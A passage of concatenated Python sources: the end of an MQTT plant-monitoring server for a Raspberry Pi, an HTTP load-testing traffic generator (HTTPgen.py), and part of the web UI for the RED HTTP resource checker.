operationError("ERR_cannotDeletePlant", errCausingHash, msg["sender"])
# end: def REQ_editPlant
# ======================================================================
# def connectionStatus
#
# Subscribes the RPI to the topic "rpi/torpi" which handles data from the
# iOS device to the RPI and the topic "rpi/fromrpi" which handles data from
# the RPI to the iOS device
#
# Arguments--
#
# client: the client connecting
#
# userdata: the data from the user connecting
#
# flags: response flags sent by the MQTT broker
#
# rc: the connection result code (0 indicates a successful connection)
#
# Returns--
#
# None
#
def connectionStatus(client, userdata, flags, rc):
mqttClient.subscribe(serverTo)
mqttClient.subscribe(serverFrom)
# end: def connectionStatus
# ======================================================================
# def operationError
#
# Creates and throws an error if something is wrong with a request
#
# Arguments--
#
# error: the error to throw
#
# msg: the hash that created the error
#
# receiver: the client who should receiver the error
#
# Returns--
#
# None
def operationError(error, msg, receiver):
publishOutgoingResponse("0", serverName, receiver, msg, error)
# end: def operationError
# ======================================================================
# def publishOutgoingResponse
#
# Publish an outgoing message with correct formatting
#
# Arguments--
#
# msgID: the ID of the message being sent
#
# sender: the name of the client sending the message
#
# receiver: the name of the client that should receive the message
#
# payload: the contents of the message
#
# operation: the request or response tag
#
# Returns--
#
# None
#
def publishOutgoingResponse(msgID, sender, receiver, payload, operation):
newMsg = "ID:" + msgID + ";sender:" + sender + ";receiver:" + receiver + ";payload:" + payload + ";operation:" + operation
publish.single(serverFrom, newMsg, hostname = serverAddress)
# end: def publishOutgoingResponse
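# Illustrative example (not part of the original protocol documentation): the call
#   publishOutgoingResponse("0", "Host-RPI3B+", "some-client", "2", "RES_numPlants")
# publishes the single string
#   ID:0;sender:Host-RPI3B+;receiver:some-client;payload:2;operation:RES_numPlants
# on the "rpi/fromrpi" topic. decodeIncomingRequest() below reverses this by
# splitting on ";" and ":", which is why payloads replace ":" with "--" before
# being sent. "some-client" is a placeholder client name.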
# ======================================================================
# def monitorClients
#
# Monitors how many messages each client is sending and ejects clients
# sending too many messages
#
# Arguments--
#
# None
#
# Returns--
#
# None
#
def monitorClients():
while (True):
for i in globals()['kickHash']:
if (globals()['kickHash'][i] > msgThreshold):
# Disconnect the client
markEjection.append(i)
globals()['kickHash'] = {} # Prepare the kickHash for the next cleanup
time.sleep(monitorInterval)
# end: def monitorClients
x = threading.Thread(target=monitorClients)
x.start()
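# Example of the rate limiting above (defaults: monitorInterval = 15s,
# msgThreshold = 15): a client that sends a 16th message within one interval is
# added to markEjection by monitorClients(), and is sent ERR_kickedForSpam the
# next time decodeIncomingRequest() handles any incoming message, since that is
# where the ejection list is drained.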
# ======================================================================
# def decodeIncomingRequest
#
# Decode a message received from the topic
#
# Arguments--
#
# client: the client connecting
#
# userdata: the data of the connected user
#
# msg: the message that came with the topic
#
# Returns--
#
# None
#
def decodeIncomingRequest(client, userdata, msg):
# Whenever a message is sent, complete the cleanup routine by kicking any previously offending clients
for client in markEjection:
publishOutgoingResponse("0", serverName, client, "none", "ERR_kickedForSpam")
globals()['markEjection'] = [] # Reset the eject list
# Decode the message
entireMsg = msg.payload.decode(encoding='UTF-8')
globals()['errCausingHash'] = entireMsg.replace(";", "|")
globals()['errCausingHash'] = globals()['errCausingHash'].replace(":", "--")
# Split the message into its elements
msgElements = entireMsg.split(";")
msgHash = {}
# Search through all the elements to make sure they are valid
for i in msgElements:
keyValue = i.split(":")
# Confirm there is one key and one value only
if (len(keyValue) > 2):
operationError("ERR_missingKeys", errCausingHash, msgHash["sender"])
return
elif (len(keyValue) < 2):
operationError("ERR_missingVals", errCausingHash, msgHash["sender"])
return
key = keyValue[0]
value = keyValue[1]
msgHash[key] = value
# Make sure there is the required number of elements in the hash
if (not (len(msgHash) == 5)):
operationError("ERR_hashLength", errCausingHash, msgHash["sender"])
return
# Check to see if the connecting client is already in kickHash
if (not msgHash["sender"] == serverName):
if (msgHash["sender"] in kickHash):
kickHash[msgHash["sender"]] += 1 # Increment the number of messages they have sent
else:
kickHash[msgHash["sender"]] = 1 # If the client did not already exist, add them
print(f">>MSG CLIENT: " + str(kickHash[msgHash["sender"]]))
# Make sure the message is not just a PUBACK (publish sent back) from the RPI host
if (not msgHash["sender"] == serverName):
# Hash to handle request tags
requestTagHash = {
"REQ_plantSensorData" : REQ_plantSensorData,
"REQ_numPlants" : REQ_numPlants,
"REQ_plantInfoOnStartup": REQ_plantInfoOnStartup,
"REQ_addNewPlant" : REQ_addNewPlant,
"REQ_deletePlant" : REQ_deletePlant,
"REQ_editPlant" : REQ_editPlant,
}
# Ignore errors about errors to prevent bouncing back
dropErr = {
"ERR_hashLength" : -1,
"ERR_missingVals" : -2,
"ERR_missingKeys" : -3,
"ERR_invalidOpTag" : -4,
"ERR_noPlantDataToRequest" : -5,
"ERR_tooManyPlants" : -6,
"ERR_cannotDeletePlant" : -7,
"ERR_invalidPlantSensorID" : -8,
}
# Figure out if the request is valid (is it in the hash above?) and call the associated function
if (msgHash["operation"] in requestTagHash):
requestTagHash[msgHash["operation"]](msgHash)
elif (msgHash["operation"] in dropErr):
print("New ERROR " + msgHash["operation"] + " with payload \"" + msgHash["payload"] + "\". Sender " + msgHash["sender"] + ", Receiver: " + msgHash["receiver"] + ", with ID " + msgHash["ID"])
return
else:
# If the tag is invalid, throw an error
operationError("ERR_invalidOpTag", errCausingHash, msgHash["sender"])
return
print("New operation " + msgHash["operation"] + " with payload \"" + msgHash["payload"] + "\". Sender " + msgHash["sender"] + ", Receiver: " + msgHash["receiver"] + ", with ID " + msgHash["ID"])
# end: def decodeIncomingRequest
# Instantiate Eclipse Paho as mqttClient
mqttClient = mqtt.Client(serverName)
# Set calling functions to mqttClient
mqttClient.on_connect = connectionStatus # Called when the RPI connects to the broker
mqttClient.on_message = decodeIncomingRequest # Called when a message is received
# Connect client to Server
mqttClient.connect(serverAddress)
# Monitor client activity forever
mqttClient.loop_forever()
|
HTTPgen.py
|
#!/usr/bin/env python2.7
# BSD 3-Clause License
#
# Copyright (c) 2018, Ondrej Holecek <ondrej at holecek dot eu>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import socket
import time
import select
import threading
import errno
import random
import json
import argparse
import sys
import os
import signal
class HTTPgen:
def __init__(self, proxy, timeouts, cache_dns, debug=False):
if proxy != None:
self.proxy_ip = proxy[0]
self.proxy_port = proxy[1]
else:
self.proxy_ip = None
self.proxy_port = None
self.connect_timeout = timeouts[0]
self.read_timeout = timeouts[1]
self.response_timeout = timeouts[2]
self.cache_dns = cache_dns
self.debug = debug
#
self.counters_lock = threading.Lock()
self.clear_counters()
self.load_reuse_stats()
#
self.sockets = {}
self.sockets_lock = threading.Lock()
self.epoll = select.epoll()
self.should_run = True
self.src_last_used = {}
self.dns_cache = {}
self.handle = threading.Thread(target=self.start_thread, args=("handler", self.handle_thread))
self.handle.start()
self.busy = None
def save_reuse_stats(self):
f = open("/tmp/reuse_stats.json", "w")
json.dump(self.src_last_used, f)
f.close()
def load_reuse_stats(self):
try:
f = open("/tmp/reuse_stats.json", "r")
self.src_last_used = json.load(f)
f.close()
except:
pass
def clear_counters(self, interval=1):
zero = {
'ok' : 0,
'invalid' : 0,
'timeouts' : {},
'error' : 0,
}
self.counters_lock.acquire()
try:
old = self.counters
except AttributeError:
old = zero
self.counters = zero
self.counters_lock.release()
# divide by interval before returning
for c in old.keys():
if type(old[c]) == int:
old[c] = int(round(float(old[c]) / interval))
elif type(old[c]) == dict:
for cc in old[c].keys():
old[c][cc] = old[c][cc] / interval
return old
def destroy(self):
self.should_run = False
self.handle.join()
if self.busy != None: self.busy.join()
self.save_reuse_stats()
def get_host_ip(self, host):
if host in self.dns_cache: return self.dns_cache[host]
try:
ip = socket.gethostbyname(host)
except socket.gaierror, e:
print >>sys.stderr, "Unable to translate host %s to IP: %s" % (host, str(e),)
if self.debug: raise
return None
if self.cache_dns: self.dns_cache[host] = ip
return ip
def try_connect(self, socket_info):
sock = socket_info['object']
# connect (with non-blocking)
try:
if self.proxy_ip != None:
sock.connect( (self.proxy_ip, self.proxy_port) )
else:
sock.connect( (self.get_host_ip(socket_info['real_host']), 80) )
except socket.error, e:
if e.args[0] in (errno.EINPROGRESS, errno.EALREADY, errno.EWOULDBLOCK):
pass
elif e.args[0] in (errno.ECONNREFUSED, errno.ECONNRESET):
socket_info['state'] = 'connection_refused'
elif e.args[0] == errno.EISCONN:
pass # TODO: ???
else:
raise
else:
socket_info['connected_time'] = time.time()
socket_info['state'] = 'sent'
socket_info['object'].send(socket_info['request'])
def cleanup(self, sockfd):
# if the socket fd was used, make sure we clean it up
self.sockets_lock.acquire()
if sockfd in self.sockets:
try:
self.epoll.unregister(sockfd)
except: pass
try:
self.sockets[sockfd]['object'].shutdown(socket.SHUT_RDWR)
self.sockets[sockfd]['object'].close()
self.sockets[sockfd]['object'] = None
except: pass
del self.sockets[sockfd]
self.sockets_lock.release()
def request(self, src_ip, proto, host, path):
while True:
# port reuse check - seems that FortiPoC is reusing ports too soon
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
sock.bind( (src_ip, 0) )
info = "%s:%i" % sock.getsockname()
if info in self.src_last_used and (time.time() - self.src_last_used[info]) < 121:
# print "socket %s reused too soon" % (info,)
continue
else:
self.src_last_used[info] = time.time()
break
#
sock.setblocking(0)
socket_info = {
'init_time' : time.time(),
'connected_time' : None,
'last_read_time' : None,
'object' : sock,
'event' : threading.Event(),
'state' : 'connecting',
'data' : '',
'real_host' : host,
}
if self.proxy_ip != None:
socket_info['request'] = 'GET %s://%s%s HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n' % (
proto,
host,
path,
host,
)
else:
socket_info['request'] = 'GET %s HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n' % (
path,
host,
)
sockfd = sock.fileno()
self.cleanup(sockfd)
self.sockets_lock.acquire()
self.sockets[sockfd] = socket_info
self.sockets_lock.release()
# register our new socket
self.epoll.register(sockfd, select.EPOLLIN | select.EPOLLERR | select.EPOLLHUP)
self.try_connect(self.sockets[sockfd])
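# Socket life cycle (as driven by try_connect() above and handle_thread() below):
# 'connecting' -> 'sent' once the non-blocking connect completes and the GET is
# written, -> 'reading' while response chunks arrive, -> 'closed' on EOF. The
# terminal states 'connect_timeout', 'initial_response_timeout', 'data_timeout',
# 'response_timeout', 'connection_refused' and 'error' also set the per-socket
# event so collect_responses_thread() can count the result and clean it up.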
def handle_thread(self):
while self.should_run:
# first process sockets with event
sockfds = self.epoll.poll(timeout=0.1)
self.sockets_lock.acquire()
for (sockfd, event) in sockfds:
# incoming data
if event == select.EPOLLIN:
# do not start reading if we haven't noticed the socket is connected
if self.sockets[sockfd]['connected_time'] == None: continue
#
part = self.sockets[sockfd]['object'].recv(1024)
self.sockets[sockfd]['data'] += part
if len(part) == 0:
self.epoll.unregister(sockfd)
self.sockets[sockfd]['state'] = 'closed'
self.sockets[sockfd]['event'].set()
else:
self.sockets[sockfd]['state'] = 'reading'
self.sockets[sockfd]['last_read_time'] = time.time()
elif event == select.EPOLLERR:
self.epoll.unregister(sockfd)
self.sockets[sockfd]['state'] = 'error'
self.sockets[sockfd]['event'].set()
elif event == select.EPOLLHUP:
# ignore as this can come before EPOLLIN
pass
# then process all of them for timeouts, etc.
for sockfd in self.sockets.keys():
socket_info = self.sockets[sockfd]
# if it is still not connected, try again
if socket_info['state'] == 'connecting':
if (time.time()-socket_info['init_time']) > self.connect_timeout:
try: self.epoll.unregister(sockfd)
except: pass
socket_info['state'] = 'connect_timeout'
socket_info['event'].set()
else:
self.try_connect(socket_info)
elif socket_info['state'] == 'sent':
if (time.time()-socket_info['connected_time']) > self.read_timeout:
try: self.epoll.unregister(sockfd)
except: pass
socket_info['state'] = 'initial_response_timeout'
socket_info['event'].set()
elif socket_info['state'] == 'reading':
if (time.time()-socket_info['last_read_time']) > self.read_timeout:
try: self.epoll.unregister(sockfd)
except: pass
socket_info['state'] = 'data_timeout'
socket_info['event'].set()
elif socket_info['state'] == 'connection_refused':
try: self.epoll.unregister(sockfd)
except: pass
socket_info['event'].set()
# enforce the full response time (only for connected sockets)
if socket_info['connected_time'] != None:
if (time.time()-socket_info['connected_time']) > self.response_timeout:
try: self.epoll.unregister(sockfd)
except: pass
socket_info['state'] = 'response_timeout'
socket_info['event'].set()
self.sockets_lock.release()
def parse_url(self, url):
r = {}
r['proto'] = url.split('://')[0]
r['host'] = url.split('://', 1)[1].split('/', 1)[0]
try:
r['path'] = '/' + url.split('://', 1)[1].split('/', 1)[1]
except:
r['path'] = '/'
if r['proto'] != 'http':
print >>sys.stderr, "Invalid url '%s': only 'http' protocol is supported at the moment" % (url,)
self.should_run = False
return r
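# For illustration: parse_url("http://www.example.com/some/path?x=1") returns
# {'proto': 'http', 'host': 'www.example.com', 'path': '/some/path?x=1'},
# while a bare "http://www.example.com" falls back to path '/'.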
def keep_busy(self, request_count, source_ips, urls, reserved):
self.busy_data = {
'request_count' : request_count,
'source_ips' : source_ips,
'urls' : [],
'reserved' : {},
}
for url in urls:
self.busy_data['urls'].append(self.parse_url(url))
for ip in reserved.keys():
self.busy_data['reserved'][ip] = self.parse_url(reserved[ip])
self.busy_data['reserved'][ip]['lastused'] = 0
self.busy = threading.Thread(target=self.start_thread, args=("starter", self.keep_busy_thread))
self.busy.start()
self.collect = threading.Thread(target=self.start_thread, args=("collector", self.collect_responses_thread))
self.collect.start()
def start_thread(self, name, function):
try:
function()
except Exception, e:
print >>sys.stderr, "Thread '%s' raised exception: %s" % (name, str(e),)
if self.debug: raise
signal.alarm(5)
self.should_run = False
def update_source_ips(self, source_ips):
self.busy_data['source_ips'] = source_ips
def keep_busy_thread(self):
while self.should_run:
start = time.time()
for i in range(self.busy_data['request_count']):
while True:
ip = random.sample(self.busy_data['source_ips'], 1)[0]
if ip in self.busy_data['reserved']:
url = self.busy_data['reserved'][ip]
if (self.busy_data['reserved'][ip]['lastused'] + 40) > start:
continue
else:
self.busy_data['reserved'][ip]['lastused'] = start
break
else:
url = random.sample(self.busy_data['urls'], 1)[0]
break
self.request( ip, url['proto'], url['host'], url['path'] )
time.sleep(float(1)/(float(self.busy_data['request_count'])*1.1))
end = time.time()
sleep = (float(1)-(end-start))
if sleep > 0: time.sleep(sleep)
def collect_responses_thread(self):
while self.should_run:
to_clean = []
started = time.time()
sockfds = self.sockets.keys()
for sockfd in sockfds:
if not self.sockets[sockfd]['event'].is_set(): continue
state = self.sockets[sockfd]['state']
data = self.sockets[sockfd]['data']
self.counters_lock.acquire()
if state == 'closed':
if data.startswith('HTTP/1.1 200 OK'):
self.counters['ok'] += 1
else:
self.counters['invalid'] += 1
elif state in ('connect_timeout', 'initial_response_timeout', 'data_timeout', 'response_timeout'):
# print "timeout: " + str(self.sockets[sockfd]['object'].getsockname())
if state not in self.counters['timeouts']: self.counters['timeouts'][state] = 0
self.counters['timeouts'][state] += 1
else:
self.counters['error'] += 1
self.counters_lock.release()
to_clean.append(sockfd)
for sockfd in to_clean:
self.cleanup(sockfd)
ended = time.time()
if (ended-started) < 1:
time.sleep(1 - (ended-started))  # sleep out the remainder of the ~1 second polling interval
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='HTTP traffic generator')
parser.add_argument('--urls', help='File with the URLs (default /etc/httpgen/urls)', default="/etc/httpgen/urls")
parser.add_argument('--ips', help='File with the source IP addresses (default /etc/httpgen/ips)', default="/etc/httpgen/ips")
parser.add_argument('--proxy', help='Proxy server in IP:port format')
parser.add_argument('--ctimeout', type=int, default=3, help='Connect timeout')
parser.add_argument('--rtimeout', type=int, default=3, help='Timeout for each read')
parser.add_argument('--stimeout', type=int, default=5, help='Session timeout')
parser.add_argument('--reqs', type=int, help='Requests per second', required=True)
parser.add_argument('--stats', help='Statistics output in format filename:interval', default="/dev/stdout:1")
parser.add_argument('--reduce', help='Reduce the number of source IPs, format seconds:count', default="0:0")
parser.add_argument('--reserve', help='Reserve the IP address for specific URL, format IP:URL', action='append', default=[])
parser.add_argument('--cachedns', action='store_true', help='Remember IP for hostnames (no TTL check)', default=False)
parser.add_argument('--debug', action='store_true', help='Enable debugging (do not use for production)', default=False)
args = parser.parse_args()
if args.proxy != None:
try:
proxy_ip = args.proxy.split(':', 1)[0]
proxy_port = int(args.proxy.split(':', 1)[1])
proxy = (proxy_ip, proxy_port)
except:
print >>sys.stderr, "Proxy address is not in the right format (IP:port)."
sys.exit(1)
else:
proxy = None
try:
stats_file = args.stats.split(':', 1)[0]
stats_int = int(args.stats.split(':', 1)[1])
except:
print >>sys.stderr, "Statistics output is not in the right format (filename:interval)."
sys.exit(1)
try:
reduce_time = int(args.reduce.split(':', 1)[0])
reduce_count = int(args.reduce.split(':', 1)[1])
except:
print >>sys.stderr, "IP reduce is in not in the right format (seconds:count)."
sys.exit(1)
reserved = {}
try:
for tmp in args.reserve:
reserved[tmp.split(':', 1)[0]] = tmp.split(':', 1)[1]
except:
print >>sys.stderr, "IP/URL reservation is not in the right format (IP:URL)"
sys.exit(1)
ips = []
try:
f = open(args.ips, "r")
while True:
line = f.readline()
if len(line) == 0: break
ips.append(line.strip())
except Exception, e:
print >>sys.stderr, "Cannot read source IPs from %s: %s" % (args.ips, str(e),)
sys.exit(1)
urls = []
try:
f = open(args.urls, "r")
while True:
line = f.readline()
if len(line) == 0: break
urls.append(line.strip())
except Exception, e:
print >>sys.stderr, "Cannot read URLs from %s: %s" % (args.urls, str(e),)
sys.exit(1)
try:
stats = file(stats_file, "a")
except Exception, e:
print >>sys.stderr, "Cannot output statistics file \"%s\": %s" % (stats_file, str(e),)
sys.exit(1)
hg = HTTPgen( proxy, (args.ctimeout, args.rtimeout, args.stimeout), args.cachedns, args.debug )
hg.keep_busy(args.reqs, ips, urls, reserved)
started = time.time()
try:
while hg.should_run:
counters = hg.clear_counters(interval=stats_int)
timeouts = 0
for t in counters['timeouts'].keys(): timeouts += counters['timeouts'][t]
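# Stats line columns: unix timestamp, requested req/s, HTTP 200 responses,
# timeouts (all categories combined), non-200 responses, other errors --
# the last four averaged per second over the stats interval.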
print >>stats, "%i %i %i %i %i %i" % (int(time.time()), args.reqs, counters['ok'], timeouts, counters['invalid'], counters['error'],)
stats.flush()
time.sleep(stats_int)
#
if reduce_time > 0 and time.time() > started+reduce_time:
reduce_time = 0
hg.update_source_ips(random.sample(ips, reduce_count))
except KeyboardInterrupt:
pass
stats.close()
hg.destroy()
|
webui.py
|
#!/usr/bin/env python
"""
A Web UI for RED, the Resource Expert Droid.
"""
__author__ = "Mark Nottingham <mnot@mnot.net>"
__copyright__ = """\
Copyright (c) 2008-2011 Mark Nottingham
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import cgi
import cPickle as pickle
import gzip
import locale
import os
import shutil
import sys
import tempfile
import time
from urlparse import urlsplit
import zlib
assert sys.version_info[0] == 2 and sys.version_info[1] >= 5, \
"Please use Python 2.5 or greater"
import nbhttp
from redbot import droid
from redbot.formatter import find_formatter, html
### Configuration ##########################################################
# TODO: make language configurable/dynamic
lang = "en"
charset = "utf-8"
# Where to store exceptions; set to None to disable traceback logging
logdir = 'exceptions'
# how many seconds to allow it to run for
max_runtime = 60
# Where to keep files for future reference, when users save them. None
# to disable saving.
save_dir = '/var/state/redbot/'
# how long to store things when users save them, in days.
save_days = 30
# URI root for static assets (absolute or relative, but no trailing '/')
html.static_root = 'static'
# directory containing files to append to the front page; None to disable
html.extra_dir = "extra"
# show errors in the browser
debug = False
### End configuration ######################################################
# HTML template for error bodies
error_template = u"""\
<p class="error">
%s
</p>
"""
try:
locale.setlocale(locale.LC_ALL, locale.normalize(lang))
except:
locale.setlocale(locale.LC_ALL, '')
class RedWebUi(object):
"""
A Web UI for RED.
Given a URI, run RED on it and present the results to output as HTML.
If descend is true, spider the links and present a summary.
"""
def __init__(self, base_uri, method, query_string, output_hdrs):
self.base_uri = base_uri
self.method = method
self._output_hdrs = output_hdrs
self.output_body = None
self.body_done = None
self.test_uri = None
self.req_hdrs = None
self.format = None
self.test_id = None
self.descend = None
self.save = None
self.parse_qs(method, query_string)
self.start = time.time()
self.timeout = nbhttp.schedule(max_runtime, self.timeoutError)
if self.save and save_dir and self.test_id:
self.save_test()
elif self.test_id:
self.load_saved_test()
elif self.test_uri:
self.run_test()
else:
self.show_default()
def output_hdrs(self, *args):
(output_body, body_done) = self._output_hdrs(*args)
self.output_body = output_body
def remove_timeout():
self.timeout.delete()
body_done()
self.body_done = None
self.body_done = remove_timeout
def save_test(self):
"""Save a previously run test_id."""
try:
# touch the save file so it isn't deleted.
os.utime(
os.path.join(save_dir, self.test_id),
(
nbhttp.now(),
nbhttp.now() + (save_days * 24 * 60 * 60)
)
)
location = "?id=%s" % self.test_id
if self.descend:
location = "%s&descend=True" % location
self.output_hdrs(
"303 See Other", [
("Location", location)
])
self.output_body("Redirecting to the saved test page...")
except (OSError, IOError):
self.output_hdrs(
"500 Internal Server Error", [
("Content-Type", "text/html; charset=%s" % charset),
])
# TODO: better error message (through formatter?)
self.output_body(
error_template % "Sorry, I couldn't save that."
)
self.body_done()
def load_saved_test(self):
"""Load a saved test by test_id."""
try:
fd = gzip.open(os.path.join(
save_dir, os.path.basename(self.test_id)
))
mtime = os.fstat(fd.fileno()).st_mtime
except (OSError, IOError, zlib.error):
self.output_hdrs(
"404 Not Found", [
("Content-Type", "text/html; charset=%s" % charset),
("Cache-Control", "max-age=600, must-revalidate")
])
# TODO: better error page (through formatter?)
self.output_body(error_template %
"I'm sorry, I can't find that saved response."
)
self.body_done()
return
is_saved = mtime > nbhttp.now()
try:
ired = pickle.load(fd)
except (pickle.PickleError, EOFError):
self.output_hdrs(
"500 Internal Server Error", [
("Content-Type", "text/html; charset=%s" % charset),
("Cache-Control", "max-age=600, must-revalidate")
])
# TODO: better error page (through formatter?)
self.output_body(error_template %
"I'm sorry, I had a problem reading that response."
)
self.body_done()
return
finally:
fd.close()
formatter = find_formatter(self.format, 'html', self.descend)(
self.base_uri, ired.uri, ired.orig_req_hdrs, lang,
self.output, allow_save=(not is_saved), is_saved=True,
test_id=self.test_id
)
self.output_hdrs(
"200 OK", [
("Content-Type", "%s; charset=%s" % (
formatter.media_type, charset)),
("Cache-Control", "max-age=3600, must-revalidate")
])
formatter.start_output()
formatter.set_red(ired)
formatter.finish_output()
self.body_done()
def run_test(self):
"""Test a URI."""
if save_dir and os.path.exists(save_dir):
try:
fd, path = tempfile.mkstemp(prefix='', dir=save_dir)
test_id = os.path.split(path)[1]
except (OSError, IOError):
# Don't try to store it.
test_id = None
else:
test_id = None
formatter = find_formatter(self.format, 'html', self.descend)(
self.base_uri, self.test_uri, self.req_hdrs, lang,
self.output, allow_save=test_id, is_saved=False,
test_id=test_id, descend=self.descend
)
self.output_hdrs(
"200 OK", [
("Content-Type", "%s; charset=%s" % (
formatter.media_type, charset)),
("Cache-Control", "max-age=60, must-revalidate")
])
ired = droid.InspectingResourceExpertDroid(
self.test_uri,
req_hdrs=self.req_hdrs,
status_cb=formatter.status,
body_procs=[formatter.feed],
descend=self.descend
)
# sys.stdout.write(pickle.dumps(ired.state))
formatter.set_red(ired.state)
formatter.start_output()
def done():
formatter.finish_output()
self.body_done()
if test_id:
try:
tmp_file = gzip.open(path, 'w')
pickle.dump(ired.state, tmp_file)
tmp_file.close()
except (IOError, zlib.error, pickle.PickleError):
pass # we don't cry if we can't store it.
# objgraph.show_growth()
ired.run(done)
def show_default(self):
"""Show the default page."""
formatter = html.BaseHtmlFormatter(
self.base_uri, self.test_uri, self.req_hdrs,
lang, self.output
)
self.output_hdrs(
"200 OK", [
("Content-Type", "%s; charset=%s" % (
formatter.media_type, charset)
),
("Cache-Control", "max-age=300")
])
formatter.start_output()
formatter.finish_output()
self.body_done()
def parse_qs(self, method, qs):
"""Given an method and a query-string dict, set attributes."""
self.test_uri = qs.get('uri', [''])[0].decode(charset, 'replace')
self.req_hdrs = [tuple(rh.split(":", 1))
for rh in qs.get("req_hdr", [])
if rh.find(":") > 0
]
self.format = qs.get('format', ['html'])[0]
self.test_id = qs.get('id', [None])[0]
self.descend = qs.get('descend', [False])[0]
if method == "POST":
self.save = qs.get('save', [False])[0]
else:
self.save = False
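# Illustration (hypothetical values): a cgi.parse_qs result such as
#   {'uri': ['http://example.com/'], 'req_hdr': ['User-Agent:RED-test'], 'descend': ['True']}
# yields test_uri = u'http://example.com/', req_hdrs = [('User-Agent', 'RED-test')],
# format = 'html' (the default), test_id = None and descend = 'True'.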
def output(self, chunk):
self.output_body(chunk.encode(charset, 'replace'))
def timeoutError(self):
""" Max runtime reached."""
self.output(error_template % ("RED timeout."))
self.body_done()
# adapted from cgitb.Hook
def except_handler_factory(out=None):
if not out:
out = sys.stdout.write
def except_handler(etype=None, evalue=None, etb=None):
"""
Log uncaught exceptions and display a friendly error.
"""
if not etype or not evalue or not etb:
etype, evalue, etb = sys.exc_info()
import cgitb
out(cgitb.reset())
if logdir is None:
out(error_template % """
A problem has occurred, but it probably isn't your fault.
""")
else:
import stat
import traceback
try:
doc = cgitb.html((etype, evalue, etb), 5)
except: # just in case something goes wrong
doc = ''.join(traceback.format_exception(etype, evalue, etb))
if debug:
out(doc)
return
try:
while etb.tb_next != None:
etb = etb.tb_next
e_file = etb.tb_frame.f_code.co_filename
e_line = etb.tb_frame.f_lineno
ldir = os.path.join(logdir, os.path.split(e_file)[-1])
if not os.path.exists(ldir):
os.umask(0000)
os.makedirs(ldir)
(fd, path) = tempfile.mkstemp(
prefix="%s_" % e_line, suffix='.html', dir=ldir
)
fh = os.fdopen(fd, 'w')
fh.write(doc)
fh.close()
os.chmod(path, stat.S_IROTH)
out(error_template % """\
A problem has occurred, but it probably isn't your fault.
RED has remembered it, and we'll try to fix it soon.""")
except:
out(error_template % """\
A problem has occurred, but it probably isn't your fault.
RED tried to save it, but it couldn't! Oops.<br>
Please e-mail the information below to
<a href='mailto:red@redbot.org'>red@redbot.org</a>
and we'll look into it.""")
out("<h3>Original Error</h3>")
out("<pre>")
out(''.join(traceback.format_exception(etype, evalue, etb)))
out("</pre>")
out("<h3>Write Error</h3>")
out("<pre>")
etype, value, tb = sys.exc_info()
out(''.join(traceback.format_exception(etype, value, tb)))
out("</pre>")
sys.exit(1) # We're in an uncertain state, so we must die horribly.
return except_handler
def mod_python_handler(r):
"""Run RED as a mod_python handler."""
from mod_python import apache
status_lookup = {
100: apache.HTTP_CONTINUE ,
101: apache.HTTP_SWITCHING_PROTOCOLS ,
102: apache.HTTP_PROCESSING ,
200: apache.HTTP_OK ,
201: apache.HTTP_CREATED ,
202: apache.HTTP_ACCEPTED ,
203: apache.HTTP_NON_AUTHORITATIVE ,
204: apache.HTTP_NO_CONTENT ,
205: apache.HTTP_RESET_CONTENT ,
206: apache.HTTP_PARTIAL_CONTENT ,
207: apache.HTTP_MULTI_STATUS ,
300: apache.HTTP_MULTIPLE_CHOICES ,
301: apache.HTTP_MOVED_PERMANENTLY ,
302: apache.HTTP_MOVED_TEMPORARILY ,
303: apache.HTTP_SEE_OTHER ,
304: apache.HTTP_NOT_MODIFIED ,
305: apache.HTTP_USE_PROXY ,
307: apache.HTTP_TEMPORARY_REDIRECT ,
400: apache.HTTP_BAD_REQUEST ,
401: apache.HTTP_UNAUTHORIZED ,
402: apache.HTTP_PAYMENT_REQUIRED ,
403: apache.HTTP_FORBIDDEN ,
404: apache.HTTP_NOT_FOUND ,
405: apache.HTTP_METHOD_NOT_ALLOWED ,
406: apache.HTTP_NOT_ACCEPTABLE ,
